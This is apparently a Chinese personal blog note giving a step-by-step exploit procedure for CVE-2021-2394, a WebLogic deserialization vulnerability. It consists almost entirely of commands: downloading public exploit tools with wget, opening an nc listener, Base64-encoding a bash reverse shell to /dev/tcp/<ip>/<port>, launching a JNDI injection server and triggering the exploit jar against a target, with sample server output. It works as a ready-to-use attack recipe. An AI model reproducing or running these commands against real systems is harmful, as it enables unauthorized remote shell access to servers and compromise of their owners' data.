【笔记】CVE-2021-2394漏洞利用

发表于 更新于 阅读次数:

前言

利用welk1n/JNDI-Injection-Exploitlz2y/CVE-2021-2394实现Weblogic反序列化漏洞利用
默认端口7001

下载项目

JNDI-Injection-Exploit

1
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

CVE-2021-2394

1
2
3
wget https://github.com/lz2y/CVE-2021-2394/releases/download/2.0/CVE_2021_2394_jar.zip
unzip CVE_2021_2394_jar.zip -d CVE_2021_2394_jar
cd CVE_2021_2394_jar

攻击者监听反弹Shell

1
nc -lvp <port>

将反弹Shell的命令进行Base64编码

1
echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64

exp

<base64>:上一步骤Base64编码后的反弹Shell命令

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" -A <ip>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[ADDRESS] >> 127.0.0.1
[COMMAND] >> bash -c {echo,<base64>}|{base64,-d}|{bash,-i}
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/xxxxxx
ldap://127.0.0.1:1389/xxxxxx
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/xxxxxx
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/xxxxxx
ldap://127.0.0.1:1389/xxxxxx

----------------------------Server Log----------------------------
2024-06-20 11:29:04 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2024-06-20 11:29:04 [RMISERVER]  >> Listening on 0.0.0.0:1099
2024-06-20 11:29:04 [LDAPSERVER] >> Listening on 0.0.0.0:1389

触发

1
java -jar CVE_2021_2394.jar <ip> <port> ldap://127.0.0.1:1389/xxxxxx

完成

参考文献

哔哩哔哩——xiaodisec